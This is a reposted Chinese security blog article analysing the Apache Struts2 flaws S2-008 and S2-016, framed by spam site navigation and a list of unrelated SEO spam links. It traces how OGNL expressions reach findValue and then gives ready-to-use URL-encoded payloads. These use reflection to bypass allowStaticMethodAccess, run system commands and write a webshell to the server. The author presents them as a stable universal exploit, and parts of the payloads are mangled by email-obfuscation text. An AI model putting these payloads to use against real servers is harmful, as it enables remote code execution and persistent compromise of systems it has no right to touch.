当前位置: 首页 > news >正文

APP开发网站建设哪家好/站长之家seo查询官方网站

APP开发网站建设哪家好,站长之家seo查询官方网站,全世界新冠型肺炎最新数据,网站关键词排名怎么优化genxor 2014/02/11 11:48weibo:genxor0x00 背景看到网上关于struts2利用的文章非常多,但是对于漏洞触发跟踪分析的文档比较少,闲来无事跟踪了一下struts最近吵得比较火的两个漏洞,研究了一下能够稳定利用的payload。0x01 S2-008Struts2框架存…

genxor · 2014/02/11 11:48

weibo:genxor

0x00 背景


看到网上关于struts2利用的文章非常多,但是对于漏洞触发跟踪分析的文档比较少,闲来无事跟踪了一下struts最近吵得比较火的两个漏洞,研究了一下能够稳定利用的payload。

0x01 S2-008


Struts2框架存在一个devmode模式,方便开发人员调试程序,但是默认devmode是不开启的,如果想要使用,需要手动修改参数,可以将struts.properties中的devmode设置为true,或是在struts.xml中添加如下代码,

<constant name="struts.devMode" value="true" /> 
复制代码

实际上devmode依赖于struts2底层的struts2-core.jar中的DebuggingInterceptor.java实现,然后漏洞也存在于此程序中。这里我以debug=command这个逻辑下,测试漏洞,我的POC如下所示:

http://localhost:8080/S2-016/hello.action?debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%[email protected][email protected]%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29 
复制代码

首先,这里是devmode的几种模式,

继续跟踪DebuggingInterceptor.java的代码,发现问题出在下面这个逻辑当中

跟踪参数如图

可以看到这里

String cmd = getParameter(EXPRESSION_PARAM); 
… 
writer.print(stack.findValue(cmd)); 
复制代码

这里cmd没做任何处理,后面直接findValue(findValue能够执行OGNL表达式,具体参考官方文档),导致OGNL表达式执行。

关于这个漏洞执行,其实没什么好说的,关键是这个payload调用java反射类(可以访问一些私有成员变量)绕过了struts2限制执行java静态方法的规则法的规则,使之前apache官方的修复又白费了。因为struts2在2.3.14.1版本之后便设置#_memberAccess[“allowStaticMethodAccess”]为不可修改,而要调用java静态方法,必须要设置allowStaticMethodAccess为true才可以。这里使用

#f = #_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')
#f.setAccessible(true) 
#f.set(#_memberAccess, true) 
复制代码

这里使用java的反射机制绕过了限制。另外,还有利用java.lang.ProcessBuilder类的start()方法来实现(ProcessBuilder类是用来创建系统进程的,每个实例管理一个进程属性集合,start方法用来创建一个新的进程实例,并且可以从相同的实例中反复多次的初始化、创建子进程。随便构造一个java.lang.ProcessBuilder的实例,然后调用它的start()方法,便达到命令执行的目的),但这个算是另一种思路,并没有从根本上修改#_memberAccess[“allowStaticMethodAccess”]的值。

0x02 S2-016


在struts2中,DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。

这里以“redirect:”前缀举例,struts2会将“redirect:”前缀后面的内容设置到redirect.location当中,这里我们一步步跟踪,首先是这个getMapping函数跟入

这里一直到这个handleSpecialParameters(),继续跟入

这里真正传入OGNL表达式是在这个parameterAction.execute()中,继续跟入来到DefaultActionMapper.java的代码

这里key.substring(REDIRECT_PREFIX.length())便是前缀后面的内容也就是OGNL表达式,struts2会调用setLocation方法将他设置到redirect.location中。然后这里调用mapping.setResult(redirect)将redirect对象设置到mapping对象中的result里,如图所示

然而上面的过程只是传递OGNL表达式,真正执行是在后面,这里是在FilterDispatcher类中的dispatcher.serviceAction()方法,这里的mapping对象中设置了传入的OGNL

这里跟入方法最终会在TextParseUtil这个类的调用stack.findValue()方法执行OGNL。

0x03 PAYLOAD


这里我结合之前几个漏洞凑出一个通用payload,目前测试还是很稳定的

命令执行

%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%[email protected][email protected]%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29
复制代码

Getshell

%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletRequest%22%29%2c%23b%3dnew+java.io.FileOutputStream%28new%20java.lang.StringBuil[email protected]@[email protected][email protected][email protected][email protected][email protected]%28%29%2c%23genxor.close%28%29
复制代码

同时在之前的struts2exp这个程序基础上修改出一个exp,整合了近几年出现的几个高危漏洞,

程序先不公开放出,大家可以自己用语句测试自己的服务器是否有该问题。

http://www.jmfq.cn/news/4954015.html

相关文章:

  • 怎么做网站的学校的大图/营业推广是一种什么样的促销方式
  • 黄网网站是怎么做的/百度霸屏推广
  • wordpress的functions.php/强强seo博客
  • 党建网站建设存在问题/搜索引擎排名的三大指标
  • 网站seo怎么优化/hs网站推广
  • 手机网站建站价格/企业网页设计报价
  • 上海团购网站建设/工具seo
  • 学做网站哪里学/百度广告点击一次多少钱
  • 加强网站建设/营销型网站建设的公司
  • 焦作网站建设公司哪家好/关键字参数
  • 在香港做网站需要什么软件/免费数据分析网站
  • 马鞍山建设集团有限公司网站/福州百度seo
  • 手机网站前端用什么做/免费百度下载
  • 怎样做投资与理财网站/腾讯会议开始收费
  • 供应邯郸专业做网站/合肥seo网站管理
  • 阿里云服务器网站备案/免费seo在线优化
  • 长春 网站建设/网站seo关键词排名
  • 跳转链接/windows优化大师官方下载
  • 长春网站制作最专业/厦门seo优化
  • 中国建设网查询平台网址/uc浏览器关键词排名优化
  • 怎么做网站赌博/百度指数爬虫
  • 用文字写美食个人网站设计作品/长春seo顾问
  • 网站优化检测工具/郑州seo建站
  • 做特产的网站开张怎么宣传/win10优化大师有用吗
  • 广东网站推广策略/seo门户网价格是多少钱
  • 甘肃最新消息今天/如何优化搜索引擎的准确性
  • 网站内页全是404/关键词代发排名首页
  • 织梦系统 子网站/百度快速收录权限域名
  • 中投中原建设有限公司网站/鹤壁网络推广哪家好
  • php网站开发工具有哪些/重庆放心seo整站优化